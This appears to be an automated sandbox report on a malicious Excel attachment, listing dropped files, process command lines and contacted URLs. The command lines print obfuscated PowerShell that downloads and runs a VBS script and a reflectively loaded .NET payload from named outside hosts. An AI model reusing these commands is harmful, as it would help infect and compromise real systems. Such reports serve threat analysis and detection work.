Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Shipping Documents WMLREF115900.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 01:50:20 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingstobegoodwithhislifebestthigns[1].hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\Shipping Documents WMLREF115900.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:45:40 2024, Security: 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\goodthingswithgreatcomebackwithgreatthigns[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C3140CD.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3B4F527.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\0kghrs1a.fgj.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\14qy4tzd.pbk.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\1yj1uz5t.cmk.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\41k31je4\CSC1CC2DACCE81D4F99A1AD504B85F71256.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\42duy5lj.1qs.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4m2igvns.wzt.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4pjehiio.eic.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4y5xw0px.xzh.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES4A69.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:45:32 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES8FC2.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:45:49 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cs1ocmfr.jni.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\gxqnjbwk.tlm.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\j5dh2wi3.upf.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\l3vqe43x.g43.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\mnlmeka0.iuk.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\pgyk4uvq.bgk.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sblybu2m\CSCFEB4FC09456049919CFF236451FA82A.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\skkivikr.nte.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\t3muzvib.ml0.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\wwihtasr.iim.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF195347EE89C81EFF.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFEFDBC6A03866A58F.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFFBE62D0B1033A10A.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\A4230000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:45:40 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\A4230000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 34 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX
bYpASs -NOp -w 1
-c DEvICecrEdentiaLdePlOYMent.ExE ;
Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient
= New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag
= 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex
= UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length
= '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed
= -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes =
[System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod
= [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD,
0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36
-rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX
bYpASs -NOp -w 1
-c DEvICecrEdentiaLdePlOYMent.ExE ;
Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient
= New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag
= 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex
= UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length
= '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed
= -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes =
[System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod
= [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD,
0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36
-rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A69.tmp"
"c:\Users\user\AppData\Local\Temp\41k31je4\CSC1CC2DACCE81D4F99A1AD504B85F71256.TMP"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC2.tmp"
"c:\Users\user\AppData\Local\Temp\sblybu2m\CSCFEB4FC09456049919CFF236451FA82A.TMP"
|
There are 8 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://192.3.176.141/36/LOGS%20LOKI.txt
|
192.3.176.141
|
|
|
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta
|
192.3.176.141
|
|
|
|
http://94.156.177.220/logs/five/fre.php
|
94.156.177.220
|
|
|
|
http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIF
|
192.3.176.141
|
|
|
|
https://drive.google.com
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://mpa.li/3
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
https://mpa.li/
|
unknown
|
||
|
http://192.3.176.141/
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFe089Q
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaicial
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaP
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://mpa.li/~
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta...
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaLKWWS
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
